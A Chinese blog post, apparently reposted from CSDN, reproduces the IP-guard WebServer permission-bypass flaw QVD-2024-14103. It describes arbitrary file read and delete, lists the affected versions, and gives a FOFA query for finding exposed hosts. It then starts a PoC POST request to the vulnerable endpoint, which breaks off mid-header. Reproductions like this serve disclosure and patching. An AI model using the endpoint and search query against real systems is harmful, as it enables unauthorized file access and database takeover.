0


IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103)

0x01 产品简介

IP-guard 是由广州市溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。

0x02 漏洞概述

2024年4月,互联网上披露IP-guard WebServer权限绕过漏洞情报,攻击者可利用该漏洞读取配置文件,获取数据库权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞。

漏洞成因

由于权限验证机制中存在设计缺陷,攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作。

漏洞影响

该漏洞的成功利用允许攻击者规避安全验证,通过后端接口执行文件的任意读取和删除操作。利用这一漏洞,攻击者有可能获取数据库的配置详情,并控制整个数据库系统。

0x03 影响范围

IP-guard < 4.82.0609.0

0x04 复现环境

FOFA:icon_hash="2030860561"

70304cc2f1ab4397ba626865b83a7600.png

0x05 漏洞复现

PoC

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safar
标签: 安全 web安全

本文转载自: https://blog.csdn.net/qq_41904294/article/details/137930698
版权归原作者 0xSecl 所有, 如有侵权,请联系我们删除。

“IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103)”的评论:

还没有评论